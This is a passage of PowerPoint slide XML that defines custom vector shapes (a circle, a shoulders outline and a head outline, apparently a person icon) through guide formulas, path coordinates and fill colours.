                <a:gd name="T42" fmla="*/ 46 w 317"/>
                <a:gd name="T43" fmla="*/ 47 h 316"/>
                <a:gd name="T44" fmla="*/ 69 w 317"/>
                <a:gd name="T45" fmla="*/ 27 h 316"/>
                <a:gd name="T46" fmla="*/ 96 w 317"/>
                <a:gd name="T47" fmla="*/ 12 h 316"/>
                <a:gd name="T48" fmla="*/ 125 w 317"/>
                <a:gd name="T49" fmla="*/ 4 h 316"/>
                <a:gd name="T50" fmla="*/ 158 w 317"/>
                <a:gd name="T51" fmla="*/ 0 h 316"/>
                <a:gd name="T52" fmla="*/ 175 w 317"/>
                <a:gd name="T53" fmla="*/ 2 h 316"/>
                <a:gd name="T54" fmla="*/ 204 w 317"/>
                <a:gd name="T55" fmla="*/ 8 h 316"/>
                <a:gd name="T56" fmla="*/ 233 w 317"/>
                <a:gd name="T57" fmla="*/ 20 h 316"/>
                <a:gd name="T58" fmla="*/ 258 w 317"/>
                <a:gd name="T59" fmla="*/ 37 h 316"/>
                <a:gd name="T60" fmla="*/ 279 w 317"/>
                <a:gd name="T61" fmla="*/ 58 h 316"/>
                <a:gd name="T62" fmla="*/ 298 w 317"/>
                <a:gd name="T63" fmla="*/ 83 h 316"/>
                <a:gd name="T64" fmla="*/ 308 w 317"/>
                <a:gd name="T65" fmla="*/ 112 h 316"/>
                <a:gd name="T66" fmla="*/ 315 w 317"/>
                <a:gd name="T67" fmla="*/ 143 h 316"/>
                <a:gd name="T68" fmla="*/ 317 w 317"/>
                <a:gd name="T69" fmla="*/ 15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 h="316">
                  <a:moveTo>
                    <a:pt x="317" y="158"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="317" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="158"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="25A4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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4114800" y="2008188"/>
              <a:ext cx="882650" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 377 w 556"/>
                <a:gd name="T1" fmla="*/ 0 h 480"/>
                <a:gd name="T2" fmla="*/ 277 w 556"/>
                <a:gd name="T3" fmla="*/ 117 h 480"/>
                <a:gd name="T4" fmla="*/ 179 w 556"/>
                <a:gd name="T5" fmla="*/ 0 h 480"/>
                <a:gd name="T6" fmla="*/ 179 w 556"/>
                <a:gd name="T7" fmla="*/ 0 h 480"/>
                <a:gd name="T8" fmla="*/ 161 w 556"/>
                <a:gd name="T9" fmla="*/ 11 h 480"/>
                <a:gd name="T10" fmla="*/ 142 w 556"/>
                <a:gd name="T11" fmla="*/ 21 h 480"/>
                <a:gd name="T12" fmla="*/ 123 w 556"/>
                <a:gd name="T13" fmla="*/ 34 h 480"/>
                <a:gd name="T14" fmla="*/ 106 w 556"/>
                <a:gd name="T15" fmla="*/ 48 h 480"/>
                <a:gd name="T16" fmla="*/ 92 w 556"/>
                <a:gd name="T17" fmla="*/ 63 h 480"/>
                <a:gd name="T18" fmla="*/ 77 w 556"/>
                <a:gd name="T19" fmla="*/ 82 h 480"/>
                <a:gd name="T20" fmla="*/ 63 w 556"/>
                <a:gd name="T21" fmla="*/ 98 h 480"/>
                <a:gd name="T22" fmla="*/ 50 w 556"/>
                <a:gd name="T23" fmla="*/ 117 h 480"/>
                <a:gd name="T24" fmla="*/ 40 w 556"/>
                <a:gd name="T25" fmla="*/ 138 h 480"/>
                <a:gd name="T26" fmla="*/ 29 w 556"/>
                <a:gd name="T27" fmla="*/ 159 h 480"/>
                <a:gd name="T28" fmla="*/ 21 w 556"/>
                <a:gd name="T29" fmla="*/ 182 h 480"/>
                <a:gd name="T30" fmla="*/ 15 w 556"/>
                <a:gd name="T31" fmla="*/ 205 h 480"/>
                <a:gd name="T32" fmla="*/ 9 w 556"/>
                <a:gd name="T33" fmla="*/ 228 h 480"/>
                <a:gd name="T34" fmla="*/ 4 w 556"/>
                <a:gd name="T35" fmla="*/ 253 h 480"/>
                <a:gd name="T36" fmla="*/ 2 w 556"/>
                <a:gd name="T37" fmla="*/ 278 h 480"/>
                <a:gd name="T38" fmla="*/ 0 w 556"/>
                <a:gd name="T39" fmla="*/ 303 h 480"/>
                <a:gd name="T40" fmla="*/ 0 w 556"/>
                <a:gd name="T41" fmla="*/ 303 h 480"/>
                <a:gd name="T42" fmla="*/ 2 w 556"/>
                <a:gd name="T43" fmla="*/ 330 h 480"/>
                <a:gd name="T44" fmla="*/ 4 w 556"/>
                <a:gd name="T45" fmla="*/ 357 h 480"/>
                <a:gd name="T46" fmla="*/ 4 w 556"/>
                <a:gd name="T47" fmla="*/ 357 h 480"/>
                <a:gd name="T48" fmla="*/ 29 w 556"/>
                <a:gd name="T49" fmla="*/ 384 h 480"/>
                <a:gd name="T50" fmla="*/ 57 w 556"/>
                <a:gd name="T51" fmla="*/ 409 h 480"/>
                <a:gd name="T52" fmla="*/ 88 w 556"/>
                <a:gd name="T53" fmla="*/ 430 h 480"/>
                <a:gd name="T54" fmla="*/ 121 w 556"/>
                <a:gd name="T55" fmla="*/ 446 h 480"/>
                <a:gd name="T56" fmla="*/ 156 w 556"/>
                <a:gd name="T57" fmla="*/ 461 h 480"/>
                <a:gd name="T58" fmla="*/ 196 w 556"/>
                <a:gd name="T59" fmla="*/ 471 h 480"/>
                <a:gd name="T60" fmla="*/ 236 w 556"/>
                <a:gd name="T61" fmla="*/ 478 h 480"/>
                <a:gd name="T62" fmla="*/ 279 w 556"/>
                <a:gd name="T63" fmla="*/ 480 h 480"/>
                <a:gd name="T64" fmla="*/ 279 w 556"/>
                <a:gd name="T65" fmla="*/ 480 h 480"/>
                <a:gd name="T66" fmla="*/ 321 w 556"/>
                <a:gd name="T67" fmla="*/ 478 h 480"/>
                <a:gd name="T68" fmla="*/ 361 w 556"/>
                <a:gd name="T69" fmla="*/ 471 h 480"/>
                <a:gd name="T70" fmla="*/ 400 w 556"/>
                <a:gd name="T71" fmla="*/ 461 h 480"/>
                <a:gd name="T72" fmla="*/ 436 w 556"/>
                <a:gd name="T73" fmla="*/ 446 h 480"/>
                <a:gd name="T74" fmla="*/ 471 w 556"/>
                <a:gd name="T75" fmla="*/ 430 h 480"/>
                <a:gd name="T76" fmla="*/ 500 w 556"/>
                <a:gd name="T77" fmla="*/ 409 h 480"/>
                <a:gd name="T78" fmla="*/ 529 w 556"/>
                <a:gd name="T79" fmla="*/ 384 h 480"/>
                <a:gd name="T80" fmla="*/ 552 w 556"/>
                <a:gd name="T81" fmla="*/ 357 h 480"/>
                <a:gd name="T82" fmla="*/ 552 w 556"/>
                <a:gd name="T83" fmla="*/ 357 h 480"/>
                <a:gd name="T84" fmla="*/ 556 w 556"/>
                <a:gd name="T85" fmla="*/ 330 h 480"/>
                <a:gd name="T86" fmla="*/ 556 w 556"/>
                <a:gd name="T87" fmla="*/ 303 h 480"/>
                <a:gd name="T88" fmla="*/ 556 w 556"/>
                <a:gd name="T89" fmla="*/ 303 h 480"/>
                <a:gd name="T90" fmla="*/ 556 w 556"/>
                <a:gd name="T91" fmla="*/ 278 h 480"/>
                <a:gd name="T92" fmla="*/ 552 w 556"/>
                <a:gd name="T93" fmla="*/ 253 h 480"/>
                <a:gd name="T94" fmla="*/ 548 w 556"/>
                <a:gd name="T95" fmla="*/ 228 h 480"/>
                <a:gd name="T96" fmla="*/ 544 w 556"/>
                <a:gd name="T97" fmla="*/ 203 h 480"/>
                <a:gd name="T98" fmla="*/ 536 w 556"/>
                <a:gd name="T99" fmla="*/ 180 h 480"/>
                <a:gd name="T100" fmla="*/ 527 w 556"/>
                <a:gd name="T101" fmla="*/ 159 h 480"/>
                <a:gd name="T102" fmla="*/ 517 w 556"/>
                <a:gd name="T103" fmla="*/ 138 h 480"/>
                <a:gd name="T104" fmla="*/ 506 w 556"/>
                <a:gd name="T105" fmla="*/ 117 h 480"/>
                <a:gd name="T106" fmla="*/ 494 w 556"/>
                <a:gd name="T107" fmla="*/ 98 h 480"/>
                <a:gd name="T108" fmla="*/ 479 w 556"/>
                <a:gd name="T109" fmla="*/ 80 h 480"/>
                <a:gd name="T110" fmla="*/ 465 w 556"/>
                <a:gd name="T111" fmla="*/ 63 h 480"/>
                <a:gd name="T112" fmla="*/ 450 w 556"/>
                <a:gd name="T113" fmla="*/ 48 h 480"/>
                <a:gd name="T114" fmla="*/ 434 w 556"/>
                <a:gd name="T115" fmla="*/ 34 h 480"/>
                <a:gd name="T116" fmla="*/ 415 w 556"/>
                <a:gd name="T117" fmla="*/ 21 h 480"/>
                <a:gd name="T118" fmla="*/ 396 w 556"/>
                <a:gd name="T119" fmla="*/ 11 h 480"/>
                <a:gd name="T120" fmla="*/ 377 w 556"/>
                <a:gd name="T121" fmla="*/ 0 h 480"/>
                <a:gd name="T122" fmla="*/ 377 w 556"/>
                <a:gd name="T1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 h="480">
                  <a:moveTo>
                    <a:pt x="377" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="277" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="98"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361" y="471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471" y="430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494" y="98"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="25A4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4789488" y="1296988"/>
              <a:ext cx="457200" cy="463550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 140 w 288"/>
                <a:gd name="T1" fmla="*/ 0 h 292"/>
                <a:gd name="T2" fmla="*/ 140 w 288"/>
                <a:gd name="T3" fmla="*/ 0 h 292"/>
                <a:gd name="T4" fmla="*/ 115 w 288"/>
                <a:gd name="T5" fmla="*/ 3 h 292"/>
                <a:gd name="T6" fmla="*/ 92 w 288"/>
                <a:gd name="T7" fmla="*/ 7 h 292"/>
                <a:gd name="T8" fmla="*/ 71 w 288"/>
                <a:gd name="T9" fmla="*/ 17 h 292"/>
                <a:gd name="T10" fmla="*/ 50 w 288"/>
                <a:gd name="T11" fmla="*/ 30 h 292"/>
                <a:gd name="T12" fmla="*/ 34 w 288"/>
                <a:gd name="T13" fmla="*/ 46 h 292"/>
                <a:gd name="T14" fmla="*/ 19 w 288"/>
                <a:gd name="T15" fmla="*/ 65 h 292"/>
                <a:gd name="T16" fmla="*/ 9 w 288"/>
                <a:gd name="T17" fmla="*/ 86 h 292"/>
                <a:gd name="T18" fmla="*/ 0 w 288"/>
                <a:gd name="T19" fmla="*/ 109 h 292"/>
                <a:gd name="T20" fmla="*/ 0 w 288"/>
                <a:gd name="T21" fmla="*/ 109 h 292"/>
                <a:gd name="T22" fmla="*/ 15 w 288"/>
                <a:gd name="T23" fmla="*/ 123 h 292"/>
                <a:gd name="T24" fmla="*/ 27 w 288"/>
                <a:gd name="T25" fmla="*/ 140 h 292"/>
                <a:gd name="T26" fmla="*/ 38 w 288"/>
                <a:gd name="T27" fmla="*/ 159 h 292"/>
                <a:gd name="T28" fmla="*/ 48 w 288"/>
                <a:gd name="T29" fmla="*/ 178 h 292"/>
                <a:gd name="T30" fmla="*/ 54 w 288"/>
                <a:gd name="T31" fmla="*/ 196 h 292"/>
                <a:gd name="T32" fmla="*/ 61 w 288"/>
                <a:gd name="T33" fmla="*/ 217 h 292"/>
                <a:gd name="T34" fmla="*/ 65 w 288"/>
                <a:gd name="T35" fmla="*/ 240 h 292"/>
                <a:gd name="T36" fmla="*/ 65 w 288"/>
                <a:gd name="T37" fmla="*/ 261 h 292"/>
                <a:gd name="T38" fmla="*/ 65 w 288"/>
                <a:gd name="T39" fmla="*/ 261 h 292"/>
                <a:gd name="T40" fmla="*/ 65 w 288"/>
                <a:gd name="T41" fmla="*/ 271 h 292"/>
                <a:gd name="T42" fmla="*/ 65 w 288"/>
                <a:gd name="T43" fmla="*/ 271 h 292"/>
                <a:gd name="T44" fmla="*/ 81 w 288"/>
                <a:gd name="T45" fmla="*/ 280 h 292"/>
                <a:gd name="T46" fmla="*/ 100 w 288"/>
                <a:gd name="T47" fmla="*/ 286 h 292"/>
                <a:gd name="T48" fmla="*/ 119 w 288"/>
                <a:gd name="T49" fmla="*/ 290 h 292"/>
                <a:gd name="T50" fmla="*/ 140 w 288"/>
                <a:gd name="T51" fmla="*/ 292 h 292"/>
                <a:gd name="T52" fmla="*/ 140 w 288"/>
                <a:gd name="T53" fmla="*/ 292 h 292"/>
                <a:gd name="T54" fmla="*/ 154 w 288"/>
                <a:gd name="T55" fmla="*/ 292 h 292"/>
                <a:gd name="T56" fmla="*/ 169 w 288"/>
                <a:gd name="T57" fmla="*/ 290 h 292"/>
                <a:gd name="T58" fmla="*/ 184 w 288"/>
                <a:gd name="T59" fmla="*/ 286 h 292"/>
                <a:gd name="T60" fmla="*/ 198 w 288"/>
                <a:gd name="T61" fmla="*/ 282 h 292"/>
                <a:gd name="T62" fmla="*/ 211 w 288"/>
                <a:gd name="T63" fmla="*/ 275 h 292"/>
                <a:gd name="T64" fmla="*/ 223 w 288"/>
                <a:gd name="T65" fmla="*/ 267 h 292"/>
                <a:gd name="T66" fmla="*/ 234 w 288"/>
                <a:gd name="T67" fmla="*/ 259 h 292"/>
                <a:gd name="T68" fmla="*/ 244 w 288"/>
                <a:gd name="T69" fmla="*/ 250 h 292"/>
                <a:gd name="T70" fmla="*/ 254 w 288"/>
                <a:gd name="T71" fmla="*/ 240 h 292"/>
                <a:gd name="T72" fmla="*/ 263 w 288"/>
                <a:gd name="T73" fmla="*/ 228 h 292"/>
                <a:gd name="T74" fmla="*/ 269 w 288"/>
                <a:gd name="T75" fmla="*/ 215 h 292"/>
                <a:gd name="T76" fmla="*/ 275 w 288"/>
                <a:gd name="T77" fmla="*/ 203 h 292"/>
                <a:gd name="T78" fmla="*/ 279 w 288"/>
                <a:gd name="T79" fmla="*/ 190 h 292"/>
                <a:gd name="T80" fmla="*/ 284 w 288"/>
                <a:gd name="T81" fmla="*/ 175 h 292"/>
                <a:gd name="T82" fmla="*/ 286 w 288"/>
                <a:gd name="T83" fmla="*/ 161 h 292"/>
                <a:gd name="T84" fmla="*/ 288 w 288"/>
                <a:gd name="T85" fmla="*/ 146 h 292"/>
                <a:gd name="T86" fmla="*/ 288 w 288"/>
                <a:gd name="T87" fmla="*/ 146 h 292"/>
                <a:gd name="T88" fmla="*/ 286 w 288"/>
                <a:gd name="T89" fmla="*/ 132 h 292"/>
                <a:gd name="T90" fmla="*/ 284 w 288"/>
                <a:gd name="T91" fmla="*/ 117 h 292"/>
                <a:gd name="T92" fmla="*/ 279 w 288"/>
                <a:gd name="T93" fmla="*/ 103 h 292"/>
                <a:gd name="T94" fmla="*/ 275 w 288"/>
                <a:gd name="T95" fmla="*/ 90 h 292"/>
                <a:gd name="T96" fmla="*/ 269 w 288"/>
                <a:gd name="T97" fmla="*/ 75 h 292"/>
                <a:gd name="T98" fmla="*/ 263 w 288"/>
                <a:gd name="T99" fmla="*/ 65 h 292"/>
                <a:gd name="T100" fmla="*/ 254 w 288"/>
                <a:gd name="T101" fmla="*/ 53 h 292"/>
                <a:gd name="T102" fmla="*/ 244 w 288"/>
                <a:gd name="T103" fmla="*/ 42 h 292"/>
                <a:gd name="T104" fmla="*/ 234 w 288"/>
                <a:gd name="T105" fmla="*/ 34 h 292"/>
                <a:gd name="T106" fmla="*/ 223 w 288"/>
                <a:gd name="T107" fmla="*/ 25 h 292"/>
                <a:gd name="T108" fmla="*/ 211 w 288"/>
                <a:gd name="T109" fmla="*/ 17 h 292"/>
                <a:gd name="T110" fmla="*/ 198 w 288"/>
                <a:gd name="T111" fmla="*/ 11 h 292"/>
                <a:gd name="T112" fmla="*/ 184 w 288"/>
                <a:gd name="T113" fmla="*/ 7 h 292"/>
                <a:gd name="T114" fmla="*/ 169 w 288"/>
                <a:gd name="T115" fmla="*/ 3 h 292"/>
                <a:gd name="T116" fmla="*/ 154 w 288"/>
                <a:gd name="T117" fmla="*/ 0 h 292"/>
                <a:gd name="T118" fmla="*/ 140 w 288"/>
                <a:gd name="T119" fmla="*/ 0 h 292"/>
                <a:gd name="T120" fmla="*/ 140 w 288"/>
                <a:gd name="T12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 h="292">
                  <a:moveTo>
                    <a:pt x="140" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288" y="146"/>
                  </a:lnTo>
